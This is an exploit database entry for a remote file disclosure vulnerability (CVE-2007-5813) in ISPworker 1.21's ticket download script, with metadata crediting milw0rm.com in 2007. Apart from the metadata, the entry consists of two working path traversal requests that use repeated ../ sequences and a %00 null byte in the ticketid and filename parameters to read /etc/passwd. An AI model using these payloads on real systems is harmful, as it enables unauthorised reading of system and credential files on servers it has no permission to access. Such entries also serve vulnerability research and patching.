ISPworker 1.21 - 'download.php' Remote File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-10-30 
date_updated:  
verified: 1 
codes: OSVDB-38358;CVE-2007-5813 
tags: 
aliases:  
screenshot_url:  
application_url: 

ISPworker 1.21 Remote File Disclosure Vulnerability
http://ispworker.de/_files/ispworker-1.21.tar.gz
/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00
/module/ticket/download.php?filename=../../../../../../../../../etc/passwd

# milw0rm.com [2007-10-31]